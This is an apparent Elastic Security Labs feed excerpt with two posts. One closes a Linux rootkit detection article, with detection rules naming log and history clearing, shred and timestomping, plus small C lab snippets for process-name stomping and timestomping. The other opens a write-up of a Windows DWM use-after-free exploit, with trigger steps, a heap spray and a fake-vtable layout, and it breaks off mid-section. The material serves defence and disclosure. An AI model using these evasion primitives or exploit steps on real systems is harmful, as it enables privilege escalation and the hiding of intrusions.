<pre><code class="language-sql">process where host.os.type == &quot;linux&quot; and auditd.data.syscall == &quot;prctl&quot; and
auditd.data.a0 == &quot;f&quot;
</code></pre>
<p>Together, these allow for the detection of this technique. In the screenshot below, we can see telemetry examples of this technique in use: the <code>process.executable</code> is gibberish, and <code>prctl</code> is then used to masquerade as a legitimate process on the system.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image14.png" alt="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names" title="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names." /></p>
<p>This rule, including its setup instructions, is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_prctl_process_name_tampering.toml">Potential Process Name Stomping with Prctl</a></li>
</ul>
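<p>For testing detection coverage in a lab, the stomping primitive itself is tiny. The sketch below is our own illustration, not code from any specific rootkit: it renames the calling thread via <code>PR_SET_NAME</code> and reads the result back (the kernel truncates comm names to 15 characters plus a NUL):</p>
<pre><code class="language-c">#include &lt;sys/prctl.h&gt;
#include &lt;string.h&gt;

/* Stomp the calling thread's comm name, as rootkit loaders do, then
 * read it back. Returns 0 when the kernel accepted the fake name. */
int stomp_name(const char *fake) {
    char buf[16] = {0};
    if (prctl(PR_SET_NAME, fake, 0, 0, 0) != 0)
        return -1;
    if (prctl(PR_GET_NAME, buf, 0, 0, 0) != 0)
        return -1;
    return strncmp(buf, fake, 15) == 0 ? 0 : 1;
}
</code></pre>
<p>Running this changes only the comm name; the original <code>process.executable</code> is untouched, which is exactly the mismatch visible in the telemetry above.</p>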
<p>Although there are many ways to masquerade, these are the most common ones observed.</p>
<h4>Log and audit cleansing</h4>
<p>Many rootkits include routines that erase traces of their installation or activity from logs. One of these techniques is to clear the victim’s shell history. This can be detected in two ways. One method is to detect the deletion of the shell history file:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.name in (
  &quot;.bash_history&quot;, &quot;.zsh_history&quot;, &quot;.sh_history&quot;, &quot;.ksh_history&quot;,
  &quot;.history&quot;, &quot;.csh_history&quot;, &quot;.tcsh_history&quot;, &quot;fish_history&quot;
)
</code></pre>
<p>The second method is to detect process executions with command line arguments related to clearing the shell history:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.args in (&quot;rm&quot;, &quot;echo&quot;) or
    (
      process.args == &quot;ln&quot; and process.args == &quot;-sf&quot; and
      process.args == &quot;/dev/null&quot;
    ) or
    (process.args == &quot;truncate&quot; and process.args == &quot;-s0&quot;)
  )
  and process.command_line like~ (
    &quot;*.bash_history*&quot;, &quot;*.zsh_history*&quot;, &quot;*.sh_history*&quot;, &quot;*.ksh_history*&quot;,
    &quot;*.history*&quot;, &quot;*.csh_history*&quot;, &quot;*.tcsh_history*&quot;, &quot;*fish_history*&quot;
  )
) or
(process.name == &quot;history&quot; and process.args == &quot;-c&quot;) or
(
  process.args == &quot;export&quot; and
  process.args like~ (&quot;HISTFILE=/dev/null&quot;, &quot;HISTFILESIZE=0&quot;)
) or
(process.args == &quot;unset&quot; and process.args like~ &quot;HISTFILE&quot;) or
(process.args == &quot;set&quot; and process.args == &quot;history&quot; and process.args == &quot;+o&quot;)
</code></pre>
<p>Having both detection rules (process and file) active will enable a more robust defense-in-depth strategy.</p>
<p>Upon loading, rootkits may taint the kernel or generate out-of-tree messages that can be identified when parsing syslog and kernel logs. To erase their tracks, rootkits may delete these log files:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.path in (
  &quot;/var/log/syslog&quot;, &quot;/var/log/messages&quot;, &quot;/var/log/secure&quot;, 
  &quot;/var/log/auth.log&quot;, &quot;/var/log/boot.log&quot;, &quot;/var/log/kern.log&quot;, 
  &quot;/var/log/dmesg&quot;
)
</code></pre>
<p>Or clear the kernel message buffer through <code>dmesg</code>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;dmesg&quot; and process.args in (&quot;-c&quot;, &quot;--clear&quot;)
</code></pre>
<p>An example of a rootkit that automatically clears the kernel ring buffer via <a href="https://man7.org/linux/man-pages/man1/dmesg.1.html">dmesg</a> is the <a href="https://github.com/bluedragonsecurity/bds_lkm">bds rootkit</a>, which loads by executing <code>/opt/bds_elf/bds_start.sh</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image12.png" alt="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg" title="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg." /></p>
<p>Another means of clearing these logs is by using <a href="https://man7.org/linux/man-pages/man1/journalctl.1.html">journalctl</a>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;journalctl&quot; and
process.args like (&quot;--vacuum-time=*&quot;, &quot;--vacuum-size=*&quot;, &quot;--vacuum-files=*&quot;)
</code></pre>
<p>This is a technique that was used by Singularity:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image11.png" alt="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl" title="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl." /></p>
<p>Another technique employed by Singularity’s loader script is the deletion of all files associated with the rootkit if it fails to load, or once it completes its loading process. For more thorough deletion, the author chose <code>shred</code> over <code>rm</code>. <code>rm</code> (remove) simply unlinks the file’s directory entry, making it fast but leaving the data recoverable. <code>shred</code> overwrites the file’s contents multiple times with random data, making recovery far harder. This makes the deletion more permanent but, at the same time, noisier from a behavior-detection point of view, since <code>shred</code> is not commonly used on most Linux systems.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;shred&quot; and (
// Any short-flag cluster containing at least one of u/z, 
// and containing no extra &quot;-&quot; after the first one
process.args regex~ &quot;-[^-]*[uz][^-]*&quot; or
process.args in (&quot;--remove&quot;, &quot;--zero&quot;)
) and
not process.parent.name == &quot;logrotate&quot;
</code></pre>
<p>The regex above makes it more difficult to evade detection by combining or reordering flags. Below is an example of Singularity looking for any files related to its deployment, and shredding them:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image13.png" alt="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence" title="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence." /></p>
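<p>The flag-cluster pattern can be sanity-checked with a POSIX extended regex. The sketch below anchors the expression, since EQL’s <code>regex~</code> matches the entire argument (its case-insensitivity is mirrored here with <code>REG_ICASE</code>):</p>
<pre><code class="language-c">#include &lt;regex.h&gt;
#include &lt;stddef.h&gt;

/* Returns 1 when a single argv token is a short-flag cluster that
 * contains 'u' (--remove) or 'z' (--zero), 0 otherwise, -1 on error. */
int matches_shred_flags(const char *arg) {
    regex_t re;
    if (regcomp(&amp;re, &quot;^-[^-]*[uz][^-]*$&quot;,
                REG_EXTENDED | REG_ICASE | REG_NOSUB) != 0)
        return -1;
    int rc = regexec(&amp;re, arg, 0, NULL, 0);
    regfree(&amp;re);
    return rc == 0 ? 1 : 0;
}
</code></pre>
<p>With this, clusters like <code>-uz</code> and <code>-fvz</code> match, while the long-form <code>--remove</code> and <code>--zero</code> are handled by the explicit list in the rule.</p>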
<p>These file and log removal techniques can be detected via several out-of-the-box detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_log_files_deleted.toml">System Log File Deletion</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml">Attempt to Clear Kernel Ring Buffer</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_journalctl_clear_logs.toml">Attempt to Clear Logs via Journalctl</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_file_deletion_via_shred.toml">File Deletion via Shred</a></li>
</ul>
<p>Once a rootkit is finished clearing its traces, it may timestomp the files it altered to ensure no file modification trace is left behind:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;touch&quot; and
process.args like (
  &quot;-t*&quot;, &quot;-d*&quot;, &quot;-a*&quot;, &quot;-m*&quot;, &quot;-r*&quot;, &quot;--date=*&quot;, &quot;--reference=*&quot;, &quot;--time=*&quot;
)
</code></pre>
<p>An example of this is shown here, where a threat actor uses the <code>/etc/ld.so.conf</code> file’s timestamp as a reference time for the files in <code>/dev/shm</code> (a tmpfs mount) in an attempt to blend in:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image3.png" alt="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm" title="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm." /></p>
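<p>Under the hood, <code>touch -r</code> simply copies the reference file’s timestamps onto the target. A minimal equivalent in C (illustrative paths, Linux/glibc) uses <code>stat</code> plus <code>utimensat</code>:</p>
<pre><code class="language-c">#define _GNU_SOURCE
#include &lt;fcntl.h&gt;
#include &lt;sys/stat.h&gt;

/* Copy atime/mtime from reference onto target, the same effect as
 * `touch -r reference target`. Returns 0 on success. */
int timestomp(const char *reference, const char *target) {
    struct stat st;
    if (stat(reference, &amp;st) != 0)
        return -1;
    struct timespec times[2] = { st.st_atim, st.st_mtim };
    return utimensat(AT_FDCWD, target, times, 0);
}
</code></pre>
<p>Note that this rewrites only atime and mtime; the inode change time (ctime) is still bumped by the operation itself, which is one of the few forensic traces timestomping leaves behind.</p>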
<p>This is a technique that we have added coverage for via both detection rules and protection artifacts:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/cross-platform/defense_evasion_timestomp_touch.toml">Timestomping using Touch Command</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_timestomping_detected_via_touch.toml">Timestomping Detected via Touch</a></li>
</ul>
<p>Although there are more techniques than we could cover here, we are confident that this research will help deepen the understanding of the Linux rootkit landscape and its detection engineering.</p>
<h2>Rootkit prevention techniques</h2>
<p>Preventing Linux rootkits requires a layered defense strategy that combines kernel and userland hardening, strict access control, and continuous monitoring. Mandatory access control frameworks, such as SELinux and AppArmor, limit process behavior and userland persistence opportunities. Meanwhile, kernel hardening techniques, including Lockdown Mode, KASLR, SMEP/SMAP, and tools like LKRG, mitigate the risk of kernel-level compromise. Restricting kernel module usage by disabling dynamic loading or enforcing module signing further reduces common vectors for rootkit deployment.</p>
<p>Visibility into malicious behavior is enhanced through Auditd and file integrity monitoring for syscall and file activity, as well as through EDR solutions that identify and prevent suspicious runtime behaviors. Security is further strengthened by minimizing process privileges through <code>seccomp-bpf</code>, Linux capabilities, and the Landlock LSM, thereby restricting syscall access and filesystem interactions.</p>
<p>Timely kernel and software updates, supported by live patching when necessary, close known vulnerabilities before they are exploited. Additionally, filesystem and device configurations should be hardened by remounting sensitive filesystems with restrictive flags and disabling access to kernel memory interfaces, such as <code>/dev/mem</code> and <code>/proc/kallsyms</code>.</p>
<p>No single control can prevent rootkits outright. A layered defense, combining configuration hardening, static and dynamic detection, and forensic readiness, remains essential.</p>
<h2>Conclusion</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/linux-rootkits-1-hooked-on-linux">part one of this series</a>, we examined how Linux rootkits operate internally, exploring their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we translated that knowledge into practical detection strategies, focusing on the behavioral signals and runtime telemetry that expose rootkit activity.</p>
<p>While Windows malware continues to dominate the focus of commercial security vendors and threat research communities, Linux remains comparatively under-researched, despite powering the majority of the world’s cloud infrastructure, high-performance computing environments, and internet services.</p>
<p>Our analysis highlights that Linux rootkits are evolving. The increasing adoption of technologies such as eBPF, <code>io_uring</code>, and containerized Linux workloads introduces new attack surfaces that are not yet well understood or widely protected.</p>
<p>We encourage the security community to:</p>
<ul>
<li>Invest in Linux-focused detection engineering from both static and dynamic angles.</li>
<li>Share research findings, proofs of concept, and detection strategies openly to accelerate collective knowledge among defenders.</li>
<li>Collaborate across vendors, academia, and industry to push Linux rootkit defense toward the same maturity level achieved on Windows.</li>
</ul>
<p>Only by collectively improving visibility, detection, and response capabilities can defenders stay ahead of this stealthy and rapidly evolving threat landscape.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/linux-rootkits-2-caught-in-the-act.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Patch diff to SYSTEM]]></title>
            <link>https://www.elastic.co/kr/security-labs/patch-diff-to-system</link>
            <guid>patch-diff-to-system</guid>
            <pubDate>Fri, 06 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Leveraging LLMs and patch diffing, this research details a Use-After-Free vulnerability in Windows DWM, demonstrating a reliable exploit that achieves escalation from low-privileged user permissions to SYSTEM.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen <a href="https://www.ibm.com/think/x-force/patch-tuesday-exploit-wednesday-pwning-windows-ancillary-function-driver-winsock">proved</a> that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.</p>
<h2>The Hunt</h2>
<p>When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities, and (hopefully) develop a working exploit for it. Top on the <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan">target list</a> were any vulnerabilities already known to be exploited in the wild. January patches included an in-the-wild information leak <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-20805">vulnerability</a> in Desktop Window Manager (DWM), which caught my eye. It also included a second DWM vulnerability which could lead to local privilege escalation. Historically, DWM has been a <a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">popular target</a> for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.</p>
<p>After running both files through Ghidra and generating BSim vectors for every function, it becomes quite easy to highlight the differences between them. Not to mention, many Microsoft-patched vulnerabilities come alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.</p>
<pre><code>======================================================================
BSim PATCH DIFF REPORT
======================================================================
File 1: dwmcore_vuln.dll
File 2: dwmcore_patched.dll 
======================================================================

----------------------------------------------------------------------------------------------------
TOP 10 MOST MODIFIED FUNCTIONS
----------------------------------------------------------------------------------------------------
  dwmcore_vuln.dll                      dwmcore_patched.dll                        Sim  Jaccard
----------------------------------------------------------------------------------------------------
  FUN_1802e7842                         FUN_1802e7842                           0.1191   0.0632
  FUN_1802e92d6                         FUN_1802e92d6                           0.1470   0.0722
  FUN_1802e5faa                         FUN_1802e5faa                           0.1741   0.0769
  ~CDelegatedInkCanvas                  ~CDelegatedInkCanvas                    0.7556   0.6047
  GetBufferedOutputTransformed          GetBufferedOutputTransformed            0.7628   0.6154
  FrameStarted                          FrameStarted                            0.7833   0.6429
  ~CSynchronousSuperWetInk              ~CSynchronousSuperWetInk                0.8018   0.6667
  FUN_1802f5aa2                         FUN_1802f5aa2                           0.9127   0.8393
  FUN_1802f57d2                         FUN_1802f5d72                           0.9127   0.8393
======================================================================
</code></pre>
<p>From here, I have to say that building a functional exploit took painfully longer than I had hoped. I spent many long nights and weekends poking and prodding the model along. A lot of this came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail, achieving RCE from a low-privileged process into DWM and on to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. However, with these techniques (and some other tooling) in hand and newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to functional exploit dropped from 3 weeks to a matter of hours.</p>
<h2>The Bug</h2>
<p>The vulnerability is a Use-After-Free in <code>CSynchronousSuperWetInk::~CSynchronousSuperWetInk</code>. The destructor conditionally removes the object from <code>CSuperWetInkManager</code> based on the return value of <code>IsSuperWetCompatible()</code>.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    this-&gt;vtable = &amp;_vftable_;
    bool bVar2 = IsSuperWetCompatible(this);
    if (bVar2) {
        CSuperWetInkManager::RemoveSource(this-&gt;composition-&gt;superWetInkManager, this);
    }
    // ... cleanup continues
}
</code></pre>
<p><em>The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.</em></p>
<h3>IsSuperWetCompatible Condition</h3>
<pre><code class="language-c">bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) {
    if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp;
        this-&gt;clipEntry != NULL &amp;&amp; this-&gt;comObject != NULL) {
        return true;
    }
    return false;
}
</code></pre>
<p><em>The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.</em></p>
<p>The function returns <code>true</code> only when either <code>LookupMode</code> equals 2 or <code>notifier1</code> is set, and both <code>clipEntry</code> and <code>comObject</code> are non-null.</p>
<h3>Triggering the Bug</h3>
<p>An attacker can:</p>
<ol>
<li>Register a <code>CSynchronousSuperWetInk</code> with the manager (requires <code>LookupMode=2</code> during <code>Draw()</code>)</li>
<li>Change <code>LookupMode</code> to 0 via <code>CMD_SET_PROPERTY</code></li>
<li>Trigger destruction via <code>CMD_RELEASE_RESOURCE</code></li>
<li><code>IsSuperWetCompatible()</code> returns FALSE → <code>RemoveSource()</code> is <strong>skipped</strong></li>
<li>A dangling pointer remains in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ol>
<p>When DWM later iterates this vector (e.g., in <code>DirtyActiveInk</code>), it dereferences the freed object's vtable, leading to controlled code execution.</p>
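<p>The lifecycle mismatch is easier to see in miniature. The sketch below is our simplified model of the pattern, not DWM’s actual code: a manager tracks raw pointers, and teardown only unregisters the object when the same compatibility check that gated registration still passes:</p>
<pre><code class="language-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;
#include &lt;stdlib.h&gt;

/* Simplified model: field names mirror the decompiled code. */
typedef struct Ink {
    int LookupMode;
    void *notifier1, *clipEntry, *comObject;
} Ink;

static Ink *sources[8];
static int n_sources;

static bool is_compatible(Ink *i) {
    return (i-&gt;LookupMode == 2 || i-&gt;notifier1) &amp;&amp; i-&gt;clipEntry &amp;&amp; i-&gt;comObject;
}

static void remove_source(Ink *i) {
    for (int k = 0; k &lt; n_sources; k++)
        if (sources[k] == i) { sources[k] = sources[--n_sources]; return; }
}

/* The flawed destructor: RemoveSource is skipped when the check fails. */
static void destroy(Ink *i) {
    if (is_compatible(i))
        remove_source(i);
    free(i);
}

/* Returns 1 when a stale pointer is left behind, mirroring steps 1-5. */
int repro_dangling(void) {
    n_sources = 0;
    Ink *i = calloc(1, sizeof *i);
    i-&gt;LookupMode = 2; i-&gt;clipEntry = i; i-&gt;comObject = i;
    sources[n_sources++] = i;          /* registered during Draw()  */
    i-&gt;LookupMode = 0;                 /* CMD_SET_PROPERTY flips it */
    uintptr_t stale = (uintptr_t)i;
    destroy(i);                        /* RemoveSource is skipped   */
    return n_sources == 1 &amp;&amp; (uintptr_t)sources[0] == stale;
}
</code></pre>
<p>Any later walk over <code>sources</code> is the analogue of <code>DirtyActiveInk</code> iterating <code>localStrokesVector</code>.</p>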
<h3>The Fix</h3>
<p>The patch adds a feature flag (<code>Feature_1732988217</code>). When enabled, <code>RemoveSource()</code> is called <strong>unconditionally</strong>, regardless of <code>IsSuperWetCompatible()</code>. This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    *(undefined ***)this = &amp;_vftable_;
    bool bVar2 = wil::details::FeatureImpl&lt;Feature_1732988217&gt;::__private_IsEnabled(&amp;impl);
    if (!bVar2) {
        bVar2 = IsSuperWetCompatible(this);
        if (!bVar2) goto LAB_1802a9b1a;  // Skip RemoveSource only if feature disabled AND !compatible
    }
    CSuperWetInkManager::RemoveSource(..., this);
LAB_1802a9b1a:
    // ... cleanup continues
}
</code></pre>
<p><em>The fixed destructor in dwmcore.dll version 10.0.26100.7623.</em></p>
<h2>The Exploit</h2>
<p>The UAF can be triggered from a regular user-mode application via the <a href="https://learn.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal">DirectComposition API</a>. The attack requires no special privileges.</p>
<h3>Prerequisites</h3>
<ol>
<li><strong>D3D11/DXGI Infrastructure</strong>: Create a D3D11 device with BGRA support and a swap chain for a visible window.</li>
<li><strong>DirectComposition Device</strong>: Initialize via <code>DCompositionCreateDevice()</code> with the DXGI device.</li>
<li><strong>NtDComposition Syscall Access</strong>: Hook or directly call <code>NtDCompositionProcessChannelBatchBuffer</code> and <code>NtDCompositionCommitChannel</code> via <code>win32u.dll</code> to inject raw batch buffer commands.</li>
</ol>
<h3>Trigger Sequence</h3>
<h4>Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)</h4>
<p>Query <code>IDCompositionInkTrailDevice</code> from the DirectComposition device, then call <code>CreateDelegatedInkTrailForSwapChain()</code> or <code>CreateDelegatedInkTrail()</code>. This allocates a <code>CSynchronousSuperWetInk</code> object (resource type <code>0xa8</code>) in dwm.exe's heap.</p>
<h4>Step 2: Create Visual and Set LookupMode=2</h4>
<p>Inject batch buffer commands to:</p>
<ol>
<li>Create a <code>CSuperWetInkVisual</code> (type <code>0xa5</code>) with <code>CMD_CREATE_RESOURCE</code> (0x02)</li>
<li>Connect visual to ink source: <code>CMD_SET_REFERENCE</code> (0x10) with propId <code>0x34</code></li>
<li>Set <code>LookupMode=2</code> on the ink source via <code>CMD_SET_PROPERTY</code> (0x0B) with propId <code>10</code></li>
<li>Connect to composition tree: <code>CMD_SET_REFERENCE</code> to handles 1 and 2 (composition target / marshaler) with propId <code>0x34</code></li>
</ol>
<p>LookupMode=2 ensures <code>IsSuperWetCompatible()</code> returns TRUE during <code>Draw()</code>, which registers the object with <code>CSuperWetInkManager::localStrokesVector</code>.</p>
<h4>Step 3: Render Frames to Register with Manager</h4>
<p>Present multiple frames (<code>IDXGISwapChain::Present</code>) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the <code>CSynchronousSuperWetInk</code> pointer in the manager's internal vector.</p>
<h4>Step 4: Set LookupMode=0 (Bypass Removal Check)</h4>
<p>Inject <code>CMD_SET_PROPERTY</code> to change <code>LookupMode</code> to <code>0</code>. Now <code>IsSuperWetCompatible()</code> will return FALSE because:</p>
<pre><code class="language-c">if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp; ...)
</code></pre>
<p>With <code>LookupMode</code> = 0 and no notifier, the first condition fails.</p>
<h4>Step 5: Release Ink Trail (Create Dangling Pointer)</h4>
<ol>
<li>Disconnect visual references: <code>CMD_SET_REFERENCE</code> with refHandle=0 for all connections</li>
<li>Release the <code>IDCompositionDelegatedInkTrail</code> interface</li>
</ol>
<p>When the destructor <code>~CSynchronousSuperWetInk</code> runs:</p>
<ul>
<li>It calls <code>IsSuperWetCompatible()</code> which returns <strong>FALSE</strong> (LookupMode=0)</li>
<li><code>RemoveSource()</code> is <strong>SKIPPED</strong></li>
<li>The object is freed but its pointer <strong>remains</strong> in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ul>
<h4>Step 6: Trigger DirtyActiveInk (Use-After-Free)</h4>
<p>Continue presenting frames and invalidating the window. DWM's composition loop calls <code>CSuperWetInkManager::DirtyActiveInk()</code>, which iterates <code>localStrokesVector</code> and dereferences the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
</code></pre>
<h3>Crash Behavior</h3>
<p>Without a heap spray, DWM crashes when accessing freed memory:</p>
<pre><code> # Call Site
00 ntdll!KiUserExceptionDispatch
01 0x00007ffe`f23270d1
02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae
03 dwmcore!CComposition::PreRender+0x99f
04 dwmcore!CComposition::ProcessComposition+0x1d7
05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
</code></pre>
<p>If the freed memory is reclaimed by another object (e.g., <code>CInteractionTrackerScaleAnimation</code>), the crash occurs at an unexpected vtable:</p>
<pre><code>kd&gt; dps rcx
00000201`fbef65f0  00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24
</code></pre>
<p>By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at <code>vtable+0x50</code>.</p>
<h2>Heap Spray</h2>
<p>To exploit the UAF, we must reclaim the freed <code>CSynchronousSuperWetInk</code> allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.</p>
<h3>Target Object Properties</h3>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Object</td>
<td align="left"><code>CSynchronousSuperWetInk</code></td>
</tr>
<tr>
<td align="left">Size</td>
<td align="left">0x120 (288 bytes)</td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>DefaultHeap::AllocClear</code> → <code>GetProcessHeap()</code></td>
</tr>
<tr>
<td align="left"><a href="https://learn.microsoft.com/en-us/windows/win32/memory/low-fragmentation-heap">LFH</a> Bucket</td>
<td align="left">34 (273-288 byte range)</td>
</tr>
<tr>
<td align="left">Slots per <a href="https://blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf">Subsegment</a></td>
<td align="left">57</td>
</tr>
</tbody>
</table>
<h3>Spray Primitive: CRegionGeometry RECT Buffer</h3>
<p>The spray uses <code>CRegionGeometry</code> resources (type <code>0x81</code>) with RECT array data:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Resource Type</td>
<td align="left"><code>0x81</code> (CRegionGeometry)</td>
</tr>
<tr>
<td align="left">Spray Size</td>
<td align="left">18 RECTs × 16 bytes = <strong>288 bytes</strong></td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>std::_Allocate&lt;16&gt;</code> → <code>HeapAlloc(GetProcessHeap(), 0, 288)</code></td>
</tr>
<tr>
<td align="left">LFH Bucket</td>
<td align="left">34, <strong>same as target</strong></td>
</tr>
<tr>
<td align="left">Content Control</td>
<td align="left">72 int32 values (18 RECTs × 4 fields)</td>
</tr>
</tbody>
</table>
<p><strong>Allocation Chain</strong>:</p>
<pre><code>dcomp.dll:   SetRectangles → ResourceSetBufferPropertyCustomWrite
win32kbase:  CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy
dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range
             → std::_Allocate&lt;16&gt; → HeapAlloc(GetProcessHeap(), 0, 288)
</code></pre>
<p>The RECT buffer is written via <code>CMD_SET_BUFFER_PROPERTY</code> (0x0F) with propId <code>5</code>:</p>
<pre><code class="language-c">struct CmdSetResourceBufferProperty {
    uint32_t cmdId;      // 0x0F
    uint32_t handle;     // Resource handle
    uint32_t propId;     // 5 for RECT array
    uint32_t dataSize;   // 288 for 18 RECTs
    // Variable-length RECT data follows (4-byte aligned)
};
</code></pre>
<h3>RECT Layout for Fake Object</h3>
<p>The 18 RECTs (288 bytes) provide full control over the reclaimed memory:</p>
<pre><code class="language-c">struct SprayRECT {
    int32_t left;    // +0x00 within RECT
    int32_t top;     // +0x04
    int32_t right;   // +0x08
    int32_t bottom;  // +0x0C
};
// Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields

// Key offsets for exploit:
// +0x00: fake vtable pointer (RECT[0].left/top)
</code></pre>
<p>Helper to write 64-bit values into adjacent RECT fields:</p>
<pre><code class="language-c">static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}
</code></pre>
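<p>As a quick sanity check of the split-write (little-endian x64 assumed; the value is arbitrary), two adjacent int32 fields laid out contiguously must reassemble into the original 64-bit value:</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

static void SetU64(int32_t *lo, int32_t *hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}

/* Round-trip a 64-bit value through two adjacent RECT fields. */
uint64_t roundtrip(uint64_t val) {
    int32_t fields[2];                 /* e.g. RECT[0].left / .top */
    SetU64(&amp;fields[0], &amp;fields[1], val);
    uint64_t out;
    memcpy(&amp;out, fields, sizeof out);  /* little-endian reassembly */
    return out;
}
</code></pre>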
<h3>Exploitation Primitive</h3>
<p>The UAF gives us a <strong>controlled vtable call with RCX pointing to our sprayed object</strong>. When <code>DirtyActiveInk</code> iterates the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
